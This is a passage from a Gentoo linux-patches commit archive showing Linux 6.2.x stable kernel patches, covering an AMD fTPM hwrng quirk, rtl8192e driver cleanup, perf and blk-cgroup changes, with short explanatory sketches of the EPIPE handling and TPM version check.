+index 56f2ec8f0f40a..3266708a86586 100755
+--- a/scripts/clang-tools/run-clang-tools.py
++++ b/scripts/clang-tools/run-clang-tools.py
+@@ -61,14 +61,21 @@ def run_analysis(entry):
+ 
+ 
+ def main():
+-    args = parse_arguments()
++    try:
++        args = parse_arguments()
+ 
+-    lock = multiprocessing.Lock()
+-    pool = multiprocessing.Pool(initializer=init, initargs=(lock, args))
+-    # Read JSON data into the datastore variable
+-    with open(args.path, "r") as f:
+-        datastore = json.load(f)
+-        pool.map(run_analysis, datastore)
++        lock = multiprocessing.Lock()
++        pool = multiprocessing.Pool(initializer=init, initargs=(lock, args))
++        # Read JSON data into the datastore variable
++        with open(args.path, "r") as f:
++            datastore = json.load(f)
++            pool.map(run_analysis, datastore)
++    except BrokenPipeError:
++        # Python flushes standard streams on exit; redirect remaining output
++        # to devnull to avoid another BrokenPipeError at shutdown
++        devnull = os.open(os.devnull, os.O_WRONLY)
++        os.dup2(devnull, sys.stdout.fileno())
++        sys.exit(1)  # Python exits with error code 1 on EPIPE
+ 
+ 
+ if __name__ == "__main__":
+diff --git a/scripts/diffconfig b/scripts/diffconfig
+index d5da5fa05d1d3..43f0f3d273ae7 100755
+--- a/scripts/diffconfig
++++ b/scripts/diffconfig
+@@ -65,7 +65,7 @@ def print_config(op, config, value, new_value):
+         else:
+             print(" %s %s -> %s" % (config, value, new_value))
+ 
+-def main():
++def show_diff():
+     global merge_style
+ 
+     # parse command line args
+@@ -129,4 +129,16 @@ def main():
+     for config in new:
+         print_config("+", config, None, b[config])
+ 
+-main()
++def main():
++    try:
++        show_diff()
++    except BrokenPipeError:
++        # Python flushes standard streams on exit; redirect remaining output
++        # to devnull to avoid another BrokenPipeError at shutdown
++        devnull = os.open(os.devnull, os.O_WRONLY)
++        os.dup2(devnull, sys.stdout.fileno())
++        sys.exit(1)  # Python exits with error code 1 on EPIPE
++
++
++if __name__ == '__main__':
++    main()
+diff --git a/tools/perf/builtin-inject.c b/tools/perf/builtin-inject.c
+index f8182417b7341..10bb1d494258d 100644
+--- a/tools/perf/builtin-inject.c
++++ b/tools/perf/builtin-inject.c
+@@ -538,6 +538,7 @@ static int perf_event__repipe_buildid_mmap2(struct perf_tool *tool,
+ 			dso->hit = 1;
+ 		}
+ 		dso__put(dso);
++		perf_event__repipe(tool, event, sample, machine);
+ 		return 0;
+ 	}
+ 
+diff --git a/tools/perf/builtin-stat.c b/tools/perf/builtin-stat.c
+index 9f3e4b2575165..387dc9c9e7bee 100644
+--- a/tools/perf/builtin-stat.c
++++ b/tools/perf/builtin-stat.c
+@@ -539,12 +539,7 @@ static int enable_counters(void)
+ 			return err;
+ 	}
+ 
+-	/*
+-	 * We need to enable counters only if:
+-	 * - we don't have tracee (attaching to task or cpu)
+-	 * - we have initial delay configured
+-	 */
+-	if (!target__none(&target)) {
++	if (!target__enable_on_exec(&target)) {
+ 		if (!all_counters_use_bpf)
+ 			evlist__enable(evsel_list);
+ 	}
+@@ -914,7 +909,7 @@ try_again_reset:
+ 			return err;
+ 	}
+ 
+-	if (stat_config.initial_delay) {
++	if (target.initial_delay) {
+ 		pr_info(EVLIST_DISABLED_MSG);
+ 	} else {
+ 		err = enable_counters();
+@@ -926,8 +921,8 @@ try_again_reset:
+ 	if (forks)
+ 		evlist__start_workload(evsel_list);
+ 
+-	if (stat_config.initial_delay > 0) {
+-		usleep(stat_config.initial_delay * USEC_PER_MSEC);
++	if (target.initial_delay > 0) {
++		usleep(target.initial_delay * USEC_PER_MSEC);
+ 		err = enable_counters();
+ 		if (err)
+ 			return -1;
+@@ -1248,7 +1243,7 @@ static struct option stat_options[] = {
+ 		     "aggregate counts per thread", AGGR_THREAD),
+ 	OPT_SET_UINT(0, "per-node", &stat_config.aggr_mode,
+ 		     "aggregate counts per numa node", AGGR_NODE),
+-	OPT_INTEGER('D', "delay", &stat_config.initial_delay,
++	OPT_INTEGER('D', "delay", &target.initial_delay,
+ 		    "ms to wait before starting measurement after program start (-1: start with events disabled)"),
+ 	OPT_CALLBACK_NOOPT(0, "metric-only", &stat_config.metric_only, NULL,
+ 			"Only print computed metrics. No raw values", enable_metric_only),
+diff --git a/tools/perf/util/stat.c b/tools/perf/util/stat.c
+index 534d36d26fc38..a07473703c6dd 100644
+--- a/tools/perf/util/stat.c
++++ b/tools/perf/util/stat.c
+@@ -842,11 +842,7 @@ int create_perf_stat_counter(struct evsel *evsel,
+ 	if (evsel__is_group_leader(evsel)) {
+ 		attr->disabled = 1;
+ 
+-		/*
+-		 * In case of initial_delay we enable tracee
+-		 * events manually.
+-		 */
+-		if (target__none(target) && !config->initial_delay)
++		if (target__enable_on_exec(target))
+ 			attr->enable_on_exec = 1;
+ 	}
+ 
+diff --git a/tools/perf/util/stat.h b/tools/perf/util/stat.h
+index 499c3bf813336..eb8cf33c3ba55 100644
+--- a/tools/perf/util/stat.h
++++ b/tools/perf/util/stat.h
+@@ -166,7 +166,6 @@ struct perf_stat_config {
+ 	FILE			*output;
+ 	unsigned int		 interval;
+ 	unsigned int		 timeout;
+-	int			 initial_delay;
+ 	unsigned int		 unit_width;
+ 	unsigned int		 metric_only_len;
+ 	int			 times;
+diff --git a/tools/perf/util/target.h b/tools/perf/util/target.h
+index daec6cba500d4..880f1af7f6ad6 100644
+--- a/tools/perf/util/target.h
++++ b/tools/perf/util/target.h
+@@ -18,6 +18,7 @@ struct target {
+ 	bool	     per_thread;
+ 	bool	     use_bpf;
+ 	bool	     hybrid;
++	int	     initial_delay;
+ 	const char   *attr_map;
+ };
+ 
+@@ -72,6 +73,17 @@ static inline bool target__none(struct target *target)
+ 	return !target__has_task(target) && !target__has_cpu(target);
+ }
+ 
++static inline bool target__enable_on_exec(struct target *target)
++{
++	/*
++	 * Normally enable_on_exec should be set if:
++	 *  1) The tracee process is forked (not attaching to existed task or cpu).
++	 *  2) And initial_delay is not configured.
++	 * Otherwise, we enable tracee events manually.
++	 */
++	return target__none(target) && !target->initial_delay;
++}
++
+ static inline bool target__has_per_thread(struct target *target)
+ {
+ 	return target->system_wide && target->per_thread;
+diff --git a/tools/testing/selftests/netfilter/nft_nat.sh b/tools/testing/selftests/netfilter/nft_nat.sh
+index 924ecb3f1f737..dd40d9f6f2599 100755
+--- a/tools/testing/selftests/netfilter/nft_nat.sh
++++ b/tools/testing/selftests/netfilter/nft_nat.sh
+@@ -404,6 +404,8 @@ EOF
+ 	echo SERVER-$family | ip netns exec "$ns1" timeout 5 socat -u STDIN TCP-LISTEN:2000 &
+ 	sc_s=$!
+ 
++	sleep 1
++
+ 	result=$(ip netns exec "$ns0" timeout 1 socat TCP:$daddr:2000 STDOUT)
+ 
+ 	if [ "$result" = "SERVER-inet" ];then


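The three scripts/* hunks above (checkkconfigsymbols.py, run-clang-tools.py, diffconfig) apply one and the same EPIPE-handling pattern. A minimal standalone sketch of that pattern, assuming a hypothetical emit_lines() as a stand-in for each script's real work:

#!/usr/bin/env python3
import os
import sys

def emit_lines():
    # Stand-in for the real work: anything that writes a lot to stdout.
    for i in range(1000000):
        print(i)

def main():
    try:
        emit_lines()
    except BrokenPipeError:
        # Python flushes standard streams on exit; redirect remaining output
        # to devnull to avoid another BrokenPipeError at shutdown.
        devnull = os.open(os.devnull, os.O_WRONLY)
        os.dup2(devnull, sys.stdout.fileno())
        sys.exit(1)  # Python exits with error code 1 on EPIPE

if __name__ == "__main__":
    main()

Piping such a script into a consumer that exits early (e.g. head -n1) closes stdout and exercises the BrokenPipeError path.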
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-13 11:30 Alice Ferrazzi
  0 siblings, 0 replies; 30+ messages in thread
From: Alice Ferrazzi @ 2023-03-13 11:30 UTC (permalink / raw)
  To: gentoo-commits

commit:     3aab80d7924f05c8026412b65c7fe17c5e1117a8
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Mon Mar 13 10:45:10 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Mon Mar 13 10:45:10 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=3aab80d7

Linux patch 6.2.6

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README            |   4 +
 1005_linux-6.2.6.patch | 262 +++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 266 insertions(+)

diff --git a/0000_README b/0000_README
index 2cb9b328..d40230d0 100644
--- a/0000_README
+++ b/0000_README
@@ -63,6 +63,10 @@ Patch:  1004_linux-6.2.5.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.5
 
+Patch:  1005_linux-6.2.6.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.6
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1005_linux-6.2.6.patch b/1005_linux-6.2.6.patch
new file mode 100644
index 00000000..38305711
--- /dev/null
+++ b/1005_linux-6.2.6.patch
@@ -0,0 +1,262 @@
+diff --git a/Makefile b/Makefile
+index 1a1d63f2a9edb..70e66e7716086 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 5
++SUBLEVEL = 6
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/drivers/char/tpm/tpm-chip.c b/drivers/char/tpm/tpm-chip.c
+index 741d8f3e8fb3a..c467eeae99733 100644
+--- a/drivers/char/tpm/tpm-chip.c
++++ b/drivers/char/tpm/tpm-chip.c
+@@ -512,6 +512,63 @@ static int tpm_add_legacy_sysfs(struct tpm_chip *chip)
+ 	return 0;
+ }
+ 
++/*
++ * Some AMD fTPM versions may cause stutter
++ * https://www.amd.com/en/support/kb/faq/pa-410
++ *
++ * Fixes are available in two series of fTPM firmware:
++ * 6.x.y.z series: 6.0.18.6 +
++ * 3.x.y.z series: 3.57.y.5 +
++ */
++static bool tpm_amd_is_rng_defective(struct tpm_chip *chip)
++{
++	u32 val1, val2;
++	u64 version;
++	int ret;
++
++	if (!(chip->flags & TPM_CHIP_FLAG_TPM2))
++		return false;
++
++	ret = tpm_request_locality(chip);
++	if (ret)
++		return false;
++
++	ret = tpm2_get_tpm_pt(chip, TPM2_PT_MANUFACTURER, &val1, NULL);
++	if (ret)
++		goto release;
++	if (val1 != 0x414D4400U /* AMD */) {
++		ret = -ENODEV;
++		goto release;
++	}
++	ret = tpm2_get_tpm_pt(chip, TPM2_PT_FIRMWARE_VERSION_1, &val1, NULL);
++	if (ret)
++		goto release;
++	ret = tpm2_get_tpm_pt(chip, TPM2_PT_FIRMWARE_VERSION_2, &val2, NULL);
++
++release:
++	tpm_relinquish_locality(chip);
++
++	if (ret)
++		return false;
++
++	version = ((u64)val1 << 32) | val2;
++	if ((version >> 48) == 6) {
++		if (version >= 0x0006000000180006ULL)
++			return false;
++	} else if ((version >> 48) == 3) {
++		if (version >= 0x0003005700000005ULL)
++			return false;
++	} else {
++		return false;
++	}
++
++	dev_warn(&chip->dev,
++		 "AMD fTPM version 0x%llx causes system stutter; hwrng disabled\n",
++		 version);
++
++	return true;
++}
++
+ static int tpm_hwrng_read(struct hwrng *rng, void *data, size_t max, bool wait)
+ {
+ 	struct tpm_chip *chip = container_of(rng, struct tpm_chip, hwrng);
+@@ -521,7 +578,8 @@ static int tpm_hwrng_read(struct hwrng *rng, void *data, size_t max, bool wait)
+ 
+ static int tpm_add_hwrng(struct tpm_chip *chip)
+ {
+-	if (!IS_ENABLED(CONFIG_HW_RANDOM_TPM) || tpm_is_firmware_upgrade(chip))
++	if (!IS_ENABLED(CONFIG_HW_RANDOM_TPM) || tpm_is_firmware_upgrade(chip) ||
++	    tpm_amd_is_rng_defective(chip))
+ 		return 0;
+ 
+ 	snprintf(chip->hwrng_name, sizeof(chip->hwrng_name),
+diff --git a/drivers/char/tpm/tpm.h b/drivers/char/tpm/tpm.h
+index 24ee4e1cc452a..830014a266090 100644
+--- a/drivers/char/tpm/tpm.h
++++ b/drivers/char/tpm/tpm.h
+@@ -150,6 +150,79 @@ enum tpm_sub_capabilities {
+ 	TPM_CAP_PROP_TIS_DURATION = 0x120,
+ };
+ 
++enum tpm2_pt_props {
++	TPM2_PT_NONE = 0x00000000,
++	TPM2_PT_GROUP = 0x00000100,
++	TPM2_PT_FIXED = TPM2_PT_GROUP * 1,
++	TPM2_PT_FAMILY_INDICATOR = TPM2_PT_FIXED + 0,
++	TPM2_PT_LEVEL = TPM2_PT_FIXED + 1,
++	TPM2_PT_REVISION = TPM2_PT_FIXED + 2,
++	TPM2_PT_DAY_OF_YEAR = TPM2_PT_FIXED + 3,
++	TPM2_PT_YEAR = TPM2_PT_FIXED + 4,
++	TPM2_PT_MANUFACTURER = TPM2_PT_FIXED + 5,
++	TPM2_PT_VENDOR_STRING_1 = TPM2_PT_FIXED + 6,
++	TPM2_PT_VENDOR_STRING_2 = TPM2_PT_FIXED + 7,
++	TPM2_PT_VENDOR_STRING_3 = TPM2_PT_FIXED + 8,
++	TPM2_PT_VENDOR_STRING_4 = TPM2_PT_FIXED + 9,
++	TPM2_PT_VENDOR_TPM_TYPE = TPM2_PT_FIXED + 10,
++	TPM2_PT_FIRMWARE_VERSION_1 = TPM2_PT_FIXED + 11,
++	TPM2_PT_FIRMWARE_VERSION_2 = TPM2_PT_FIXED + 12,
++	TPM2_PT_INPUT_BUFFER = TPM2_PT_FIXED + 13,
++	TPM2_PT_HR_TRANSIENT_MIN = TPM2_PT_FIXED + 14,
++	TPM2_PT_HR_PERSISTENT_MIN = TPM2_PT_FIXED + 15,
++	TPM2_PT_HR_LOADED_MIN = TPM2_PT_FIXED + 16,
++	TPM2_PT_ACTIVE_SESSIONS_MAX = TPM2_PT_FIXED + 17,
++	TPM2_PT_PCR_COUNT = TPM2_PT_FIXED + 18,
++	TPM2_PT_PCR_SELECT_MIN = TPM2_PT_FIXED + 19,
++	TPM2_PT_CONTEXT_GAP_MAX = TPM2_PT_FIXED + 20,
++	TPM2_PT_NV_COUNTERS_MAX = TPM2_PT_FIXED + 22,
++	TPM2_PT_NV_INDEX_MAX = TPM2_PT_FIXED + 23,
++	TPM2_PT_MEMORY = TPM2_PT_FIXED + 24,
++	TPM2_PT_CLOCK_UPDATE = TPM2_PT_FIXED + 25,
++	TPM2_PT_CONTEXT_HASH = TPM2_PT_FIXED + 26,
++	TPM2_PT_CONTEXT_SYM = TPM2_PT_FIXED + 27,
++	TPM2_PT_CONTEXT_SYM_SIZE = TPM2_PT_FIXED + 28,
++	TPM2_PT_ORDERLY_COUNT = TPM2_PT_FIXED + 29,
++	TPM2_PT_MAX_COMMAND_SIZE = TPM2_PT_FIXED + 30,
++	TPM2_PT_MAX_RESPONSE_SIZE = TPM2_PT_FIXED + 31,
++	TPM2_PT_MAX_DIGEST = TPM2_PT_FIXED + 32,
++	TPM2_PT_MAX_OBJECT_CONTEXT = TPM2_PT_FIXED + 33,
++	TPM2_PT_MAX_SESSION_CONTEXT = TPM2_PT_FIXED + 34,
++	TPM2_PT_PS_FAMILY_INDICATOR = TPM2_PT_FIXED + 35,
++	TPM2_PT_PS_LEVEL = TPM2_PT_FIXED + 36,
++	TPM2_PT_PS_REVISION = TPM2_PT_FIXED + 37,
++	TPM2_PT_PS_DAY_OF_YEAR = TPM2_PT_FIXED + 38,
++	TPM2_PT_PS_YEAR = TPM2_PT_FIXED + 39,
++	TPM2_PT_SPLIT_MAX = TPM2_PT_FIXED + 40,
++	TPM2_PT_TOTAL_COMMANDS = TPM2_PT_FIXED + 41,
++	TPM2_PT_LIBRARY_COMMANDS = TPM2_PT_FIXED + 42,
++	TPM2_PT_VENDOR_COMMANDS = TPM2_PT_FIXED + 43,
++	TPM2_PT_NV_BUFFER_MAX = TPM2_PT_FIXED + 44,
++	TPM2_PT_MODES = TPM2_PT_FIXED + 45,
++	TPM2_PT_MAX_CAP_BUFFER = TPM2_PT_FIXED + 46,
++	TPM2_PT_VAR = TPM2_PT_GROUP * 2,
++	TPM2_PT_PERMANENT = TPM2_PT_VAR + 0,
++	TPM2_PT_STARTUP_CLEAR = TPM2_PT_VAR + 1,
++	TPM2_PT_HR_NV_INDEX = TPM2_PT_VAR + 2,
++	TPM2_PT_HR_LOADED = TPM2_PT_VAR + 3,
++	TPM2_PT_HR_LOADED_AVAIL = TPM2_PT_VAR + 4,
++	TPM2_PT_HR_ACTIVE = TPM2_PT_VAR + 5,
++	TPM2_PT_HR_ACTIVE_AVAIL = TPM2_PT_VAR + 6,
++	TPM2_PT_HR_TRANSIENT_AVAIL = TPM2_PT_VAR + 7,
++	TPM2_PT_HR_PERSISTENT = TPM2_PT_VAR + 8,
++	TPM2_PT_HR_PERSISTENT_AVAIL = TPM2_PT_VAR + 9,
++	TPM2_PT_NV_COUNTERS = TPM2_PT_VAR + 10,
++	TPM2_PT_NV_COUNTERS_AVAIL = TPM2_PT_VAR + 11,
++	TPM2_PT_ALGORITHM_SET = TPM2_PT_VAR + 12,
++	TPM2_PT_LOADED_CURVES = TPM2_PT_VAR + 13,
++	TPM2_PT_LOCKOUT_COUNTER = TPM2_PT_VAR + 14,
++	TPM2_PT_MAX_AUTH_FAIL = TPM2_PT_VAR + 15,
++	TPM2_PT_LOCKOUT_INTERVAL = TPM2_PT_VAR + 16,
++	TPM2_PT_LOCKOUT_RECOVERY = TPM2_PT_VAR + 17,
++	TPM2_PT_NV_WRITE_RECOVERY = TPM2_PT_VAR + 18,
++	TPM2_PT_AUDIT_COUNTER_0 = TPM2_PT_VAR + 19,
++	TPM2_PT_AUDIT_COUNTER_1 = TPM2_PT_VAR + 20,
++};
+ 
+ /* 128 bytes is an arbitrary cap. This could be as large as TPM_BUFSIZE - 18
+  * bytes, but 128 is still a relatively large number of random bytes and
+diff --git a/drivers/staging/rtl8192e/rtl8192e/rtl_dm.c b/drivers/staging/rtl8192e/rtl8192e/rtl_dm.c
+index a18393c8a8339..4eb66781649ca 100644
+--- a/drivers/staging/rtl8192e/rtl8192e/rtl_dm.c
++++ b/drivers/staging/rtl8192e/rtl8192e/rtl_dm.c
+@@ -185,7 +185,6 @@ static void _rtl92e_dm_init_fsync(struct net_device *dev);
+ static void _rtl92e_dm_deinit_fsync(struct net_device *dev);
+ 
+ static	void _rtl92e_dm_check_txrateandretrycount(struct net_device *dev);
+-static  void _rtl92e_dm_check_ac_dc_power(struct net_device *dev);
+ static void _rtl92e_dm_check_fsync(struct net_device *dev);
+ static void _rtl92e_dm_check_rf_ctrl_gpio(void *data);
+ static void _rtl92e_dm_fsync_timer_callback(struct timer_list *t);
+@@ -238,8 +237,6 @@ void rtl92e_dm_watchdog(struct net_device *dev)
+ 	if (priv->being_init_adapter)
+ 		return;
+ 
+-	_rtl92e_dm_check_ac_dc_power(dev);
+-
+ 	_rtl92e_dm_check_txrateandretrycount(dev);
+ 	_rtl92e_dm_check_edca_turbo(dev);
+ 
+@@ -257,26 +254,6 @@ void rtl92e_dm_watchdog(struct net_device *dev)
+ 	_rtl92e_dm_cts_to_self(dev);
+ }
+ 
+-static void _rtl92e_dm_check_ac_dc_power(struct net_device *dev)
+-{
+-	struct r8192_priv *priv = rtllib_priv(dev);
+-	static const char ac_dc_script[] = "/etc/acpi/wireless-rtl-ac-dc-power.sh";
+-	char *argv[] = {(char *)ac_dc_script, DRV_NAME, NULL};
+-	static char *envp[] = {"HOME=/",
+-			"TERM=linux",
+-			"PATH=/usr/bin:/bin",
+-			 NULL};
+-
+-	if (priv->rst_progress == RESET_TYPE_SILENT)
+-		return;
+-	if (priv->rtllib->state != RTLLIB_LINKED)
+-		return;
+-	call_usermodehelper(ac_dc_script, argv, envp, UMH_WAIT_PROC);
+-
+-	return;
+-};
+-
+-
+ void rtl92e_init_adaptive_rate(struct net_device *dev)
+ {
+ 
+@@ -1662,10 +1639,6 @@ static void _rtl92e_dm_check_rf_ctrl_gpio(void *data)
+ 	u8 tmp1byte;
+ 	enum rt_rf_power_state rf_power_state_to_set;
+ 	bool bActuallySet = false;
+-	char *argv[3];
+-	static const char RadioPowerPath[] = "/etc/acpi/events/RadioPower.sh";
+-	static char *envp[] = {"HOME=/", "TERM=linux", "PATH=/usr/bin:/bin",
+-			       NULL};
+ 
+ 	bActuallySet = false;
+ 
+@@ -1695,14 +1668,6 @@ static void _rtl92e_dm_check_rf_ctrl_gpio(void *data)
+ 		mdelay(1000);
+ 		priv->hw_rf_off_action = 1;
+ 		rtl92e_set_rf_state(dev, rf_power_state_to_set, RF_CHANGE_BY_HW);
+-		if (priv->hw_radio_off)
+-			argv[1] = "RFOFF";
+-		else
+-			argv[1] = "RFON";
+-
+-		argv[0] = (char *)RadioPowerPath;
+-		argv[2] = NULL;
+-		call_usermodehelper(RadioPowerPath, argv, envp, UMH_WAIT_PROC);
+ 	}
+ }
+ 
+diff --git a/net/wireless/sme.c b/net/wireless/sme.c
+index 4f813e346a8bc..ce1ac01705f9b 100644
+--- a/net/wireless/sme.c
++++ b/net/wireless/sme.c
+@@ -1504,8 +1504,6 @@ int cfg80211_connect(struct cfg80211_registered_device *rdev,
+ 		connect->key = NULL;
+ 		connect->key_len = 0;
+ 		connect->key_idx = 0;
+-		connect->crypto.cipher_group = 0;
+-		connect->crypto.n_ciphers_pairwise = 0;
+ 	}
+ 
+ 	wdev->connect_keys = connkeys;


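The tpm-chip.c hunk above reduces to one 64-bit comparison: TPM2_PT_FIRMWARE_VERSION_1 and _2 are concatenated and checked against a per-series threshold. A sketch re-checking just that arithmetic (amd_ftpm_rng_defective() here is a hypothetical standalone function; it skips the TPM2-flag and manufacturer probing the driver performs first):

def amd_ftpm_rng_defective(val1: int, val2: int) -> bool:
    # val1/val2 mirror TPM2_PT_FIRMWARE_VERSION_1/_2 from the driver.
    version = (val1 << 32) | val2
    series = version >> 48
    if series == 6:
        return version < 0x0006000000180006   # fixed from the 6.0.18.6 firmware on
    if series == 3:
        return version < 0x0003005700000005   # fixed from the 3.57.y.5 firmware on
    return False  # other series are not flagged

assert amd_ftpm_rng_defective(0x00060000, 0x00180005)      # just below the 6.x threshold
assert not amd_ftpm_rng_defective(0x00060000, 0x00180006)  # at the fixed 6.x threshold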
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-11 11:19 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-03-11 11:19 UTC (permalink / raw)
  To: gentoo-commits

commit:     6b9d9c40593cd66b2df8055d546f7697b2cc8210
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Mar 11 11:18:49 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Mar 11 11:18:49 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=6b9d9c40

Linux patch 6.2.4

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |   4 ++
 1003_linux-6.2.4.patch | 123 +++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 127 insertions(+)

diff --git a/0000_README b/0000_README
index 57b81d70..f3f521f1 100644
--- a/0000_README
+++ b/0000_README
@@ -55,6 +55,10 @@ Patch:  1002_linux-6.2.3.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.3
 
+Patch:  1003_linux-6.2.4.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.4
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1003_linux-6.2.4.patch b/1003_linux-6.2.4.patch
new file mode 100644
index 00000000..e8c12ad2
--- /dev/null
+++ b/1003_linux-6.2.4.patch
@@ -0,0 +1,123 @@
+diff --git a/Makefile b/Makefile
+index eef164b4172a9..83cbbc3adbb12 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 3
++SUBLEVEL = 4
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c
+index 45881f8c79130..9ac1efb053e08 100644
+--- a/block/blk-cgroup.c
++++ b/block/blk-cgroup.c
+@@ -118,32 +118,14 @@ static void blkg_free_workfn(struct work_struct *work)
+ {
+ 	struct blkcg_gq *blkg = container_of(work, struct blkcg_gq,
+ 					     free_work);
+-	struct request_queue *q = blkg->q;
+ 	int i;
+ 
+-	/*
+-	 * pd_free_fn() can also be called from blkcg_deactivate_policy(),
+-	 * in order to make sure pd_free_fn() is called in order, the deletion
+-	 * of the list blkg->q_node is delayed to here from blkg_destroy(), and
+-	 * blkcg_mutex is used to synchronize blkg_free_workfn() and
+-	 * blkcg_deactivate_policy().
+-	 */
+-	if (q)
+-		mutex_lock(&q->blkcg_mutex);
+-
+ 	for (i = 0; i < BLKCG_MAX_POLS; i++)
+ 		if (blkg->pd[i])
+ 			blkcg_policy[i]->pd_free_fn(blkg->pd[i]);
+ 
+-	if (blkg->parent)
+-		blkg_put(blkg->parent);
+-
+-	if (q) {
+-		list_del_init(&blkg->q_node);
+-		mutex_unlock(&q->blkcg_mutex);
+-		blk_put_queue(q);
+-	}
+-
++	if (blkg->q)
++		blk_put_queue(blkg->q);
+ 	free_percpu(blkg->iostat_cpu);
+ 	percpu_ref_exit(&blkg->refcnt);
+ 	kfree(blkg);
+@@ -176,6 +158,8 @@ static void __blkg_release(struct rcu_head *rcu)
+ 
+ 	/* release the blkcg and parent blkg refs this blkg has been holding */
+ 	css_put(&blkg->blkcg->css);
++	if (blkg->parent)
++		blkg_put(blkg->parent);
+ 	blkg_free(blkg);
+ }
+ 
+@@ -474,14 +458,9 @@ static void blkg_destroy(struct blkcg_gq *blkg)
+ 	lockdep_assert_held(&blkg->q->queue_lock);
+ 	lockdep_assert_held(&blkcg->lock);
+ 
+-	/*
+-	 * blkg stays on the queue list until blkg_free_workfn(), see details in
+-	 * blkg_free_workfn(), hence this function can be called from
+-	 * blkcg_destroy_blkgs() first and again from blkg_destroy_all() before
+-	 * blkg_free_workfn().
+-	 */
+-	if (hlist_unhashed(&blkg->blkcg_node))
+-		return;
++	/* Something wrong if we are trying to remove same group twice */
++	WARN_ON_ONCE(list_empty(&blkg->q_node));
++	WARN_ON_ONCE(hlist_unhashed(&blkg->blkcg_node));
+ 
+ 	for (i = 0; i < BLKCG_MAX_POLS; i++) {
+ 		struct blkcg_policy *pol = blkcg_policy[i];
+@@ -493,6 +472,7 @@ static void blkg_destroy(struct blkcg_gq *blkg)
+ 	blkg->online = false;
+ 
+ 	radix_tree_delete(&blkcg->blkg_tree, blkg->q->id);
++	list_del_init(&blkg->q_node);
+ 	hlist_del_init_rcu(&blkg->blkcg_node);
+ 
+ 	/*
+@@ -1293,7 +1273,6 @@ int blkcg_init_disk(struct gendisk *disk)
+ 	int ret;
+ 
+ 	INIT_LIST_HEAD(&q->blkg_list);
+-	mutex_init(&q->blkcg_mutex);
+ 
+ 	new_blkg = blkg_alloc(&blkcg_root, disk, GFP_KERNEL);
+ 	if (!new_blkg)
+@@ -1531,7 +1510,6 @@ void blkcg_deactivate_policy(struct request_queue *q,
+ 	if (queue_is_mq(q))
+ 		blk_mq_freeze_queue(q);
+ 
+-	mutex_lock(&q->blkcg_mutex);
+ 	spin_lock_irq(&q->queue_lock);
+ 
+ 	__clear_bit(pol->plid, q->blkcg_pols);
+@@ -1550,7 +1528,6 @@ void blkcg_deactivate_policy(struct request_queue *q,
+ 	}
+ 
+ 	spin_unlock_irq(&q->queue_lock);
+-	mutex_unlock(&q->blkcg_mutex);
+ 
+ 	if (queue_is_mq(q))
+ 		blk_mq_unfreeze_queue(q);
+diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
+index 10ee92db680c9..43d4e073b1115 100644
+--- a/include/linux/blkdev.h
++++ b/include/linux/blkdev.h
+@@ -484,7 +484,6 @@ struct request_queue {
+ 	DECLARE_BITMAP		(blkcg_pols, BLKCG_MAX_POLS);
+ 	struct blkcg_gq		*root_blkg;
+ 	struct list_head	blkg_list;
+-	struct mutex		blkcg_mutex;
+ #endif
+ 
+ 	struct queue_limits	limits;


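The restored blkg_destroy() above treats a second removal of the same group as a bug (WARN_ON_ONCE) where the reverted code silently returned early on an already-unhashed node. A toy sketch of the two policies, with illustrative names only (Node, destroy_warn and destroy_idempotent are not kernel identifiers):

class Node:
    def __init__(self):
        self.linked = True  # analogue of sitting on the q_node/blkcg_node lists

def destroy_warn(node):
    # Restored behaviour: double removal indicates a bug worth reporting.
    assert node.linked, "trying to remove same group twice"
    node.linked = False

def destroy_idempotent(node):
    # Reverted behaviour: tolerate a second call, since blkg_destroy_all()
    # could legitimately run after blkcg_destroy_blkgs() but before the
    # deferred free work had unlinked the node.
    if not node.linked:
        return
    node.linked = False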
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-10 12:37 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-03-10 12:37 UTC (permalink / raw)
  To: gentoo-commits

commit:     3d261b682e1bda28f3fc52ce8c45e9ab259f2b3f
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar 10 12:37:46 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar 10 12:37:46 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=3d261b68

Linux patch 6.2.3

